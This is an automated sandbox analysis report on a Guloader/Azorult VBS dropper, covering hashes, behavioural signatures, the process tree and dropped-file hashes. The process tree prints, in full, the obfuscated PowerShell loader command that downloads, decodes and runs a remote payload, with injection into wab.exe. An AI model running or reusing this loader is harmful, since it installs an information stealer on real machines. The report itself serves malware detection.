Resubmissions
08-03-2024 02:13
240308-cnvt9acf72 10Analysis
-
max time kernel
146s -
max time network
158s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
08-03-2024 02:13
Static task
static1
Behavioral task
behavioral1
Sample
59b83a0e37ac6e046cf013616d51dff99d06d0bbbcc02b585c9cd1d1fa7e952d.vbs
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
59b83a0e37ac6e046cf013616d51dff99d06d0bbbcc02b585c9cd1d1fa7e952d.vbs
Resource
win10v2004-20240226-en
General
-
Target
59b83a0e37ac6e046cf013616d51dff99d06d0bbbcc02b585c9cd1d1fa7e952d.vbs
-
Size
26KB
-
MD5
9c85d725803bf621f8a45680650fd841
-
SHA1
0b8b47cb69205a89d6fac5ea156630c7732ca031
-
SHA256
59b83a0e37ac6e046cf013616d51dff99d06d0bbbcc02b585c9cd1d1fa7e952d
-
SHA512
4329e4da03d19106020dc8d958f96b1f3c0da082e69221f2a14be32599a30cae40df38075fd6a43ecac7001b6d61c6652130cab340e6ab02a525d42588c28e70
-
SSDEEP
768:tIIJFMkYm8rSvWiRTcOuTgyjbpfn9FVItJpT+NYQcOudS0ttNA85WvjFSIgya3IW:KAFMk/8uvWiRgOuTgyjbpfn9FVItJpTD
Malware Config
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Blocklisted process makes network request 1 IoCs
Processes:
WScript.exeflow pid process 5 716 WScript.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation WScript.exe -
Loads dropped DLL 4 IoCs
Processes:
wab.exepid process 4256 wab.exe 4256 wab.exe 4256 wab.exe 4256 wab.exe -
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
wab.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook wab.exe Key opened \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook wab.exe Key opened \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook wab.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
Processes:
wab.exepid process 4256 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.exewab.exepid process 2224 powershell.exe 4256 wab.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 2224 set thread context of 4256 2224 powershell.exe wab.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
wab.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wab.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wab.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 2600 timeout.exe -
Processes:
WScript.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\07E032E020B72C3F192F0628A2593A19A70F069E\Blob = 040000000100000010000000d5e98140c51869fc462c8975620faa780f0000000100000014000000a8569ccd21ef9cc5737c7a12df608c2cbc545df153000000010000006500000030633021060b2a84680186f6770205010130123010060a2b0601040182373c0101030200c03021060b2a84680186f6770205010730123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080b0000000100000034000000430065007200740075006d002000540072007500730074006500640020004e006500740077006f0072006b0020004300410000006200000001000000200000005c58468d55f58e497e743982d2b50010b6d165374acf83a7d4a32db768c4408e1400000001000000140000000876cdcb07ff24f6c5cdedbb90bce284374675f71d0000000100000010000000e3f9af952c6df2aaa41706a77a44c20303000000010000001400000007e032e020b72c3f192f0628a2593a19a70f069e1900000001000000100000001f7e750b566b128ac0b8d6576d2a70a52000000001000000bf030000308203bb308202a3a00302010202030444c0300d06092a864886f70d0101050500307e310b300906035504061302504c31223020060355040a1319556e697a65746f20546563686e6f6c6f6769657320532e412e31273025060355040b131e43657274756d2043657274696669636174696f6e20417574686f72697479312230200603550403131943657274756d2054727573746564204e6574776f726b204341301e170d3038313032323132303733375a170d3239313233313132303733375a307e310b300906035504061302504c31223020060355040a1319556e697a65746f20546563686e6f6c6f6769657320532e412e31273025060355040b131e43657274756d2043657274696669636174696f6e20417574686f72697479312230200603550403131943657274756d2054727573746564204e6574776f726b20434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e3fb7da372bac2f0c91487f56b014ee16e4007ba6d275d7ff75b2db35ac7515faba432a66187b66e0f86d2300297f8d76957a118395d6a6479c60159ac3c314a387cd204d24b28e8205f3b07a2cc4d73dbf3ae4fc756d55aa79689faf3ab68d423865927cf0927bcac6e72831c3072dfe0a2e9d2e1747519bd2a9e7b1554041bd74339ad5528c5e21abbf4c0e4ae384933cc76859f3945d2a49ef2128c51f87ce42d7ff5ac5feb169fb12dd1bacc9142774c25c990386fdbf0ccfb8e1e97593ed5604ee60528ed4979134bba48db2ff972d339cafe1fd83472f5b440cf3101c3ecde112d175d1fb850d15e19a769de073328ca5095f9a754cb54865045a9f9490203010001a3423040300f0603551d130101ff040530030101ff301d0603551d0e041604140876cdcb07ff24f6c5cdedbb90bce284374675f7300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100a6a8ad22ce013da6a3ff62d0489d8b5e72b07844e3dc1caf09fd2348fabd2ac4b95504b510a38d27de0b8263d0eede0c3779415b22b2b09a415ca670e0d4d077cb23d300e06c562fe1690d0dd9aabf218150d906a5a8ff9537d0aafee2b3f5992d45848ae54209d774022ff789d899e9bc27d4478dba0d461c77cf14a41cb9a431c49c28740334ff331926a5e90d74b73e97c676e82796a366dde1aef2415bca9856837370e4861ad23141ba2fbe2d135a766f4ee84e810e3f5b0322a012be6658114acb03c4b42a2a2d9617e03954bc48d376279d9a2d06a6c9ec39d2abdb9f9a0b27023529b14095e7f9e89c55881946d6b734f57ece399ad938f151f74f2c WScript.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\07E032E020B72C3F192F0628A2593A19A70F069E\Blob = 5c0000000100000004000000000800001900000001000000100000001f7e750b566b128ac0b8d6576d2a70a503000000010000001400000007e032e020b72c3f192f0628a2593a19a70f069e1d0000000100000010000000e3f9af952c6df2aaa41706a77a44c2031400000001000000140000000876cdcb07ff24f6c5cdedbb90bce284374675f76200000001000000200000005c58468d55f58e497e743982d2b50010b6d165374acf83a7d4a32db768c4408e0b0000000100000034000000430065007200740075006d002000540072007500730074006500640020004e006500740077006f0072006b002000430041000000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000006500000030633021060b2a84680186f6770205010130123010060a2b0601040182373c0101030200c03021060b2a84680186f6770205010730123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f0000000100000014000000a8569ccd21ef9cc5737c7a12df608c2cbc545df1040000000100000010000000d5e98140c51869fc462c8975620faa782000000001000000bf030000308203bb308202a3a00302010202030444c0300d06092a864886f70d0101050500307e310b300906035504061302504c31223020060355040a1319556e697a65746f20546563686e6f6c6f6769657320532e412e31273025060355040b131e43657274756d2043657274696669636174696f6e20417574686f72697479312230200603550403131943657274756d2054727573746564204e6574776f726b204341301e170d3038313032323132303733375a170d3239313233313132303733375a307e310b300906035504061302504c31223020060355040a1319556e697a65746f20546563686e6f6c6f6769657320532e412e31273025060355040b131e43657274756d2043657274696669636174696f6e20417574686f72697479312230200603550403131943657274756d2054727573746564204e6574776f726b20434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e3fb7da372bac2f0c91487f56b014ee16e4007ba6d275d7ff75b2db35ac7515faba432a66187b66e0f86d2300297f8d76957a118395d6a6479c60159ac3c314a387cd204d24b28e8205f3b07a2cc4d73dbf3ae4fc756d55aa79689faf3ab68d423865927cf0927bcac6e72831c3072dfe0a2e9d2e1747519bd2a9e7b1554041bd74339ad5528c5e21abbf4c0e4ae384933cc76859f3945d2a49ef2128c51f87ce42d7ff5ac5feb169fb12dd1bacc9142774c25c990386fdbf0ccfb8e1e97593ed5604ee60528ed4979134bba48db2ff972d339cafe1fd83472f5b440cf3101c3ecde112d175d1fb850d15e19a769de073328ca5095f9a754cb54865045a9f9490203010001a3423040300f0603551d130101ff040530030101ff301d0603551d0e041604140876cdcb07ff24f6c5cdedbb90bce284374675f7300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100a6a8ad22ce013da6a3ff62d0489d8b5e72b07844e3dc1caf09fd2348fabd2ac4b95504b510a38d27de0b8263d0eede0c3779415b22b2b09a415ca670e0d4d077cb23d300e06c562fe1690d0dd9aabf218150d906a5a8ff9537d0aafee2b3f5992d45848ae54209d774022ff789d899e9bc27d4478dba0d461c77cf14a41cb9a431c49c28740334ff331926a5e90d74b73e97c676e82796a366dde1aef2415bca9856837370e4861ad23141ba2fbe2d135a766f4ee84e810e3f5b0322a012be6658114acb03c4b42a2a2d9617e03954bc48d376279d9a2d06a6c9ec39d2abdb9f9a0b27023529b14095e7f9e89c55881946d6b734f57ece399ad938f151f74f2c WScript.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\07E032E020B72C3F192F0628A2593A19A70F069E WScript.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exepowershell.exewab.exepid process 1672 powershell.exe 1672 powershell.exe 2224 powershell.exe 2224 powershell.exe 4256 wab.exe 4256 wab.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
powershell.exepid process 2224 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 1672 powershell.exe Token: SeDebugPrivilege 2224 powershell.exe -
Suspicious use of WriteProcessMemory 16 IoCs
Processes:
WScript.exepowershell.exepowershell.exewab.execmd.exedescription pid process target process PID 716 wrote to memory of 1672 716 WScript.exe powershell.exe PID 716 wrote to memory of 1672 716 WScript.exe powershell.exe PID 1672 wrote to memory of 2224 1672 powershell.exe powershell.exe PID 1672 wrote to memory of 2224 1672 powershell.exe powershell.exe PID 1672 wrote to memory of 2224 1672 powershell.exe powershell.exe PID 2224 wrote to memory of 4256 2224 powershell.exe wab.exe PID 2224 wrote to memory of 4256 2224 powershell.exe wab.exe PID 2224 wrote to memory of 4256 2224 powershell.exe wab.exe PID 2224 wrote to memory of 4256 2224 powershell.exe wab.exe PID 2224 wrote to memory of 4256 2224 powershell.exe wab.exe PID 4256 wrote to memory of 2560 4256 wab.exe cmd.exe PID 4256 wrote to memory of 2560 4256 wab.exe cmd.exe PID 4256 wrote to memory of 2560 4256 wab.exe cmd.exe PID 2560 wrote to memory of 2600 2560 cmd.exe timeout.exe PID 2560 wrote to memory of 2600 2560 cmd.exe timeout.exe PID 2560 wrote to memory of 2600 2560 cmd.exe timeout.exe -
outlook_office_path 1 IoCs
Processes:
wab.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook wab.exe -
outlook_win_path 1 IoCs
Processes:
wab.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook wab.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\59b83a0e37ac6e046cf013616d51dff99d06d0bbbcc02b585c9cd1d1fa7e952d.vbs"1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:716 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Handbreadth='Opsonology:\Multiflorae';Set-Content $Handbreadth 'Exclosure';$Udragende=Test-Path $Handbreadth;if($Udragende){exit};function Kransstillet9 ($Dobbeltbevidsthedens){For($Pentacosane=4; $Pentacosane -lt $Dobbeltbevidsthedens.Length-1; $Pentacosane+=5){$Suprabuccal=$Suprabuccal+$Dobbeltbevidsthedens.'Substring'($Pentacosane, 1)};$Suprabuccal;}$Brokkedes=Kransstillet9 'DemuhManit BantNavip Nors.nfi: E.i/Refr/Subzd.bstr TraiU,gmvAnate Eks. Ud,gKundo Lavo Intg .rblUd.ye,kle.Dro.cPo,ao.nesm Roa/OpskuDepac Ins?HelieProvxRivap,iafoU,enrWhertGuid= SandKu koCyprw.ommnCulvlStenoF,ysa,verdDist&Kvali MisdE,do=Eksp1Visi8 CoulS raJCal.dRib 4FastVAft.DPeriA re.DUncaQAnveVkelpiTim,cTepoXUrydjSojawR,tty L.ir F,rqStyr1Subl3 ldenH.leE Cul8Rame3BevilHirtl Tolr Re._ C rSGiovkExc q ,or ';$Suprabuccal01=Kransstillet9 'Trl.iSti eMe ixBill ';$Efterbevilliges = Kransstillet9 'Bagg\.alss estyUndes andwRajpoFor,wPsyk6 Af.4Valg\PineWPriniBal nEscodRa,boRabbwKon.sBldnPLeadosurgw GioeFllerLunkSA beh T.lechrolAparlSchr\U.ejv Ind1Ro.g.Arbe0 Bla\ByplpIskroSykuwHobeeUnderUn.es O ahVe ee erflUdbrlL,te.Kde,e Renxe ideOver ';&($Suprabuccal01) (Kransstillet9 'Loch$FundOPerup Pols Kn oDetenMegaoLegelE ilooutsgSootyK on2Simu=G,ta$Di.aeStudn.endvPas.:Discw UnaiTrtinSpedd EneiCortr Ind ') ;&($Suprabuccal01) (Kransstillet9 'Bana$Pr wEPrmifMxfutColpeCivirskrib Emae,ortvSproiUnrilVergl acriBarmgdeite EndsWest=In o$AmatO DowpCapis Sclo LynnJonooPs,ulAlfaoDramg D cyOver2Skr.+Aggr$BaciEHyd.fafletEkskePi,mr,ncrbWheleMndevSoapiUdpalOwenl PoliUnpagLye eFests Bdd ') ;&($Suprabuccal01) (Kransstillet9 'Dewo$AarsI DisnDobltHel.oJingxSaniiT.ndcS peaArect PseeandesMyre .uts= Ska Amer( For(Achig PyrwFagtmSibli U,a haltw orviGeasnSkak3Frem2Antr_ko,epresprHus,o phicT xee WassGobosOv,r Infr-BaadFPost SupePVedhrEgotoShabcHy.reSprosRe,tsskalIHydrdPost=Ab.l$ ,dd{ uniPDattIBegyDi du}Excu)Micr. ImpCNutmoOct.mO,kom s,gaSdlan Kabd MusL Ps,i E.dnSup efu d)Pa.d G,ff-SamtsPostpEjeclKorti,dsttMarm Fane[P,otcCen hEkspa tefr ,ea] il3 For4 tr. ');&($Suprabuccal01) (Kransstillet9 'Begy$.nveCReweh usga Rr,mSigtfJernr InpaBenai I enDige Havn=Emyd embl$ rusIinstnBibltErkeo BlkxJou.iPlumcKaffaKroat S,reTills tr[Rens$MercISchin t.mtFed.oH.ndxD lkiBuggc St.aErfatSt.eeDacks ,ag.Hexec Mulo ampu DrenNo rtDert-R.ge2Afb.]Afkl ');&($Suprabuccal01) (Kransstillet9 'Aand$BlreC Rega,ansrRe noParlm .ineHeeldFaen=Unri(WedsTUni.eBesks deptScow-HvidPConca .idtMe,ehBequ And$ReguESenaf.ecotPurpeRainrS.atb .eie,ativ T kiRadbl MonlSubti.rifgPulveHap.s ler)Unme Alie-piloATunfn OvedDehy Trol(Kar [TvrmIPsycn.nertDepaPChart Andr Mod]Efte:Auto:Af ksSnotiTragz FireKur Klbe-,orteS.mpq Irr None8Armv)Mel, ') ;if ($Caromed) {&$Efterbevilliges $Chamfrain;} else {;$Suprabuccal00=Kransstillet9 ' DaiS .obt.icnafuggr elet ilb-SmanBAdstiCocktV.ids MakTDeoxrJordaMiksn.itosT,rpfPatheDjrvr V,i Prer-S,vaSPig.o eleuLaanrFlorc SyneUdde Supe$EkstB Frer L,no ,ttkBarrkExhaeVarmd O eeKalks Dis Rune-TranDRmmee SovsRebotB ggiUskin BoraAlcotIsopiChilo Signdign Pyrr$ReprOPro,p AposPastoGrsrnmiaooMemblSneuo Fi gEncryRela2 ,gf ';&($Suprabuccal01) (Kransstillet9 'Natt$DespO emgp .vesHameoCandn CatoPhysl,uttoNatugRingy Rec2 Aer= Bu,$ Va,eCestn To vN ur: CitaP lyp SkapTerndA,roa C,ct titaSe i ') ;&($Suprabuccal01) (Kransstillet9 'MexiI codm RospHaaro nhurvidetJer.- BooMUndeoForhd HypuHypslSanteAp,o NgteBDenai SumtKnalsI,ruTP.eurPancaMenin salsOasdfTe.aeLenirNond ') ;$Opsonology2=$Opsonology2+'\Manumissive.Maa';while (-not $Isocheimenal) {&($Suprabuccal01) (Kransstillet9 'Soup$Sn.nIDeamspjalollincDemihDagseNongi FilmUdsoeLagen,ersaJe.tlIsf.=Baan(Co.nTtofaeSavesUtritLade-PhytP peraCeratTwadh t,i Ombr$ByboO Brup Slus ResoH.ndnDitaoBueslRet,oUnasgP.orySymb2 Ndd) ,ey ') ;&($Suprabuccal01) $Suprabuccal00;&($Suprabuccal01) (Kransstillet9 ' BeaSRevotCredaDiakrPulgtG,nn-Un,oSSemil RegeChireBesvp,ron Hju,5Recu ');}&($Suprabuccal01) (Kransstillet9 'Wr.p$JubiKVks,r Traa IndnUdnvs Tris LentTilsiGur.lregilObsee setSou. mpo=Knib CoatGPreseDob.t Prc-GnosCUndeo,orenEogatguile Dimnsubzt Pla Mens$TornO.delpS.rosAfkboStrinill o,irklO taoS.iggInexyTryg2Q ar ');&($Suprabuccal01) (Kransstillet9 ',eop$A.beBUk.eaPreclComplOp ao HartFe ra,izatSk uiTweeoPatcnNoseeByg nMest1Adol9Unde4Rhab as.l= Ret Ne r[ WilSGlsnyEscrsSel tOrphe alvmBist.KabbCDelgoGenbn Jeav,moreVarirG,art em]Lymp:Know:FemkFW,itrvrngoRabamNoncBvipsaGlacsG,noe ,og6.ars4 oveSSemit Cowr Moni Gr.nF ougB.nz(Sca.$Fr.sKUncorTejuaBer n P,ms.imbsJuict SlaiDo.kl .hils,ateMolltNonm) ,ar ');&($Suprabuccal01) (Kransstillet9 'Cen $ KamSBoreuSjlepUndirAflua ,lab,loausputcBehfcDinga,enelGene2 Bol A.p= Cre .upr[MercSP.fcyRespssugatNordeLockmMan .KlimTT poe.anixArgotSeis.CommESabbn .atcGallo No.dmed,iPennn Ov.gGr,l]Skit:Edge:TjenAKrenSNonlCInteICompILuss.OverGT rmeDiagtdingSTrigtAsierC nciMi,inM.nxgH em(u dv$HypnB akkaDiscl FlolPalmodevetNu.baka,ktMonoiEflao shin Fjee DobnMult1h.ve9Naph4Ludd) Del ');&($Suprabuccal01) (Kransstillet9 'Arch$ B.goAvi v s.aeAfsprLab pVen rBil sDureiObfudTotae P.unFrittEx,reContnUnde=Rais$Sti,SBa.kuDammp lufrFoulaudgabVareu.fgicGabscNeonaUdful .ol2Rest. Fers ArbuHo.ebWi,zsOrdnt E ar SiciEro,nCoungPick(,uve3Samf0Ekss2prec8p,ot1Peri2Thyr,Past3 Mis8F.mr9Exha7S.bs7Lant)Tra, ');&($Suprabuccal01) $overprsidenten;}"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1672 -
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Handbreadth='Opsonology:\Multiflorae';Set-Content $Handbreadth 'Exclosure';$Udragende=Test-Path $Handbreadth;if($Udragende){exit};function Kransstillet9 ($Dobbeltbevidsthedens){For($Pentacosane=4; $Pentacosane -lt $Dobbeltbevidsthedens.Length-1; $Pentacosane+=5){$Suprabuccal=$Suprabuccal+$Dobbeltbevidsthedens.'Substring'($Pentacosane, 1)};$Suprabuccal;}$Brokkedes=Kransstillet9 'DemuhManit BantNavip Nors.nfi: E.i/Refr/Subzd.bstr TraiU,gmvAnate Eks. Ud,gKundo Lavo Intg .rblUd.ye,kle.Dro.cPo,ao.nesm Roa/OpskuDepac Ins?HelieProvxRivap,iafoU,enrWhertGuid= SandKu koCyprw.ommnCulvlStenoF,ysa,verdDist&Kvali MisdE,do=Eksp1Visi8 CoulS raJCal.dRib 4FastVAft.DPeriA re.DUncaQAnveVkelpiTim,cTepoXUrydjSojawR,tty L.ir F,rqStyr1Subl3 ldenH.leE Cul8Rame3BevilHirtl Tolr Re._ C rSGiovkExc q ,or ';$Suprabuccal01=Kransstillet9 'Trl.iSti eMe ixBill ';$Efterbevilliges = Kransstillet9 'Bagg\.alss estyUndes andwRajpoFor,wPsyk6 Af.4Valg\PineWPriniBal nEscodRa,boRabbwKon.sBldnPLeadosurgw GioeFllerLunkSA beh T.lechrolAparlSchr\U.ejv Ind1Ro.g.Arbe0 Bla\ByplpIskroSykuwHobeeUnderUn.es O ahVe ee erflUdbrlL,te.Kde,e Renxe ideOver ';&($Suprabuccal01) (Kransstillet9 'Loch$FundOPerup Pols Kn oDetenMegaoLegelE ilooutsgSootyK on2Simu=G,ta$Di.aeStudn.endvPas.:Discw UnaiTrtinSpedd EneiCortr Ind ') ;&($Suprabuccal01) (Kransstillet9 'Bana$Pr wEPrmifMxfutColpeCivirskrib Emae,ortvSproiUnrilVergl acriBarmgdeite EndsWest=In o$AmatO DowpCapis Sclo LynnJonooPs,ulAlfaoDramg D cyOver2Skr.+Aggr$BaciEHyd.fafletEkskePi,mr,ncrbWheleMndevSoapiUdpalOwenl PoliUnpagLye eFests Bdd ') ;&($Suprabuccal01) (Kransstillet9 'Dewo$AarsI DisnDobltHel.oJingxSaniiT.ndcS peaArect PseeandesMyre .uts= Ska Amer( For(Achig PyrwFagtmSibli U,a haltw orviGeasnSkak3Frem2Antr_ko,epresprHus,o phicT xee WassGobosOv,r Infr-BaadFPost SupePVedhrEgotoShabcHy.reSprosRe,tsskalIHydrdPost=Ab.l$ ,dd{ uniPDattIBegyDi du}Excu)Micr. ImpCNutmoOct.mO,kom s,gaSdlan Kabd MusL Ps,i E.dnSup efu d)Pa.d G,ff-SamtsPostpEjeclKorti,dsttMarm Fane[P,otcCen hEkspa tefr ,ea] il3 For4 tr. ');&($Suprabuccal01) (Kransstillet9 'Begy$.nveCReweh usga Rr,mSigtfJernr InpaBenai I enDige Havn=Emyd embl$ rusIinstnBibltErkeo BlkxJou.iPlumcKaffaKroat S,reTills tr[Rens$MercISchin t.mtFed.oH.ndxD lkiBuggc St.aErfatSt.eeDacks ,ag.Hexec Mulo ampu DrenNo rtDert-R.ge2Afb.]Afkl ');&($Suprabuccal01) (Kransstillet9 'Aand$BlreC Rega,ansrRe noParlm .ineHeeldFaen=Unri(WedsTUni.eBesks deptScow-HvidPConca .idtMe,ehBequ And$ReguESenaf.ecotPurpeRainrS.atb .eie,ativ T kiRadbl MonlSubti.rifgPulveHap.s ler)Unme Alie-piloATunfn OvedDehy Trol(Kar [TvrmIPsycn.nertDepaPChart Andr Mod]Efte:Auto:Af ksSnotiTragz FireKur Klbe-,orteS.mpq Irr None8Armv)Mel, ') ;if ($Caromed) {&$Efterbevilliges $Chamfrain;} else {;$Suprabuccal00=Kransstillet9 ' DaiS .obt.icnafuggr elet ilb-SmanBAdstiCocktV.ids MakTDeoxrJordaMiksn.itosT,rpfPatheDjrvr V,i Prer-S,vaSPig.o eleuLaanrFlorc SyneUdde Supe$EkstB Frer L,no ,ttkBarrkExhaeVarmd O eeKalks Dis Rune-TranDRmmee SovsRebotB ggiUskin BoraAlcotIsopiChilo Signdign Pyrr$ReprOPro,p AposPastoGrsrnmiaooMemblSneuo Fi gEncryRela2 ,gf ';&($Suprabuccal01) (Kransstillet9 'Natt$DespO emgp .vesHameoCandn CatoPhysl,uttoNatugRingy Rec2 Aer= Bu,$ Va,eCestn To vN ur: CitaP lyp SkapTerndA,roa C,ct titaSe i ') ;&($Suprabuccal01) (Kransstillet9 'MexiI codm RospHaaro nhurvidetJer.- BooMUndeoForhd HypuHypslSanteAp,o NgteBDenai SumtKnalsI,ruTP.eurPancaMenin salsOasdfTe.aeLenirNond ') ;$Opsonology2=$Opsonology2+'\Manumissive.Maa';while (-not $Isocheimenal) {&($Suprabuccal01) (Kransstillet9 'Soup$Sn.nIDeamspjalollincDemihDagseNongi FilmUdsoeLagen,ersaJe.tlIsf.=Baan(Co.nTtofaeSavesUtritLade-PhytP peraCeratTwadh t,i Ombr$ByboO Brup Slus ResoH.ndnDitaoBueslRet,oUnasgP.orySymb2 Ndd) ,ey ') ;&($Suprabuccal01) $Suprabuccal00;&($Suprabuccal01) (Kransstillet9 ' BeaSRevotCredaDiakrPulgtG,nn-Un,oSSemil RegeChireBesvp,ron Hju,5Recu ');}&($Suprabuccal01) (Kransstillet9 'Wr.p$JubiKVks,r Traa IndnUdnvs Tris LentTilsiGur.lregilObsee setSou. mpo=Knib CoatGPreseDob.t Prc-GnosCUndeo,orenEogatguile Dimnsubzt Pla Mens$TornO.delpS.rosAfkboStrinill o,irklO taoS.iggInexyTryg2Q ar ');&($Suprabuccal01) (Kransstillet9 ',eop$A.beBUk.eaPreclComplOp ao HartFe ra,izatSk uiTweeoPatcnNoseeByg nMest1Adol9Unde4Rhab as.l= Ret Ne r[ WilSGlsnyEscrsSel tOrphe alvmBist.KabbCDelgoGenbn Jeav,moreVarirG,art em]Lymp:Know:FemkFW,itrvrngoRabamNoncBvipsaGlacsG,noe ,og6.ars4 oveSSemit Cowr Moni Gr.nF ougB.nz(Sca.$Fr.sKUncorTejuaBer n P,ms.imbsJuict SlaiDo.kl .hils,ateMolltNonm) ,ar ');&($Suprabuccal01) (Kransstillet9 'Cen $ KamSBoreuSjlepUndirAflua ,lab,loausputcBehfcDinga,enelGene2 Bol A.p= Cre .upr[MercSP.fcyRespssugatNordeLockmMan .KlimTT poe.anixArgotSeis.CommESabbn .atcGallo No.dmed,iPennn Ov.gGr,l]Skit:Edge:TjenAKrenSNonlCInteICompILuss.OverGT rmeDiagtdingSTrigtAsierC nciMi,inM.nxgH em(u dv$HypnB akkaDiscl FlolPalmodevetNu.baka,ktMonoiEflao shin Fjee DobnMult1h.ve9Naph4Ludd) Del ');&($Suprabuccal01) (Kransstillet9 'Arch$ B.goAvi v s.aeAfsprLab pVen rBil sDureiObfudTotae P.unFrittEx,reContnUnde=Rais$Sti,SBa.kuDammp lufrFoulaudgabVareu.fgicGabscNeonaUdful .ol2Rest. Fers ArbuHo.ebWi,zsOrdnt E ar SiciEro,nCoungPick(,uve3Samf0Ekss2prec8p,ot1Peri2Thyr,Past3 Mis8F.mr9Exha7S.bs7Lant)Tra, ');&($Suprabuccal01) $overprsidenten;}"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2224 -
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"4⤵
- Loads dropped DLL
- Accesses Microsoft Outlook profiles
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
- outlook_office_path
- outlook_win_path
PID:4256 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "wab.exe"5⤵
- Suspicious use of WriteProcessMemory
PID:2560 -
C:\Windows\SysWOW64\timeout.exeC:\Windows\system32\timeout.exe 36⤵
- Delays execution with timeout.exe
PID:2600
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
135KB
MD59e682f1eb98a9d41468fc3e50f907635
SHA185e0ceca36f657ddf6547aa0744f0855a27527ee
SHA256830533bb569594ec2f7c07896b90225006b90a9af108f49d6fb6bebd02428b2d
SHA512230230722d61ac1089fabf3f2decfa04f9296498f8e2a2a49b1527797dca67b5a11ab8656f04087acadf873fa8976400d57c77c404eba4aff89d92b9986f32ed
-
Filesize
429KB
MD5109f0f02fd37c84bfc7508d4227d7ed5
SHA1ef7420141bb15ac334d3964082361a460bfdb975
SHA256334e69ac9367f708ce601a6f490ff227d6c20636da5222f148b25831d22e13d4
SHA51246eb62b65817365c249b48863d894b4669e20fcb3992e747cd5c9fdd57968e1b2cf7418d1c9340a89865eadda362b8db51947eb4427412eb83b35994f932fd39
-
Filesize
1.2MB
MD5556ea09421a0f74d31c4c0a89a70dc23
SHA1f739ba9b548ee64b13eb434a3130406d23f836e3
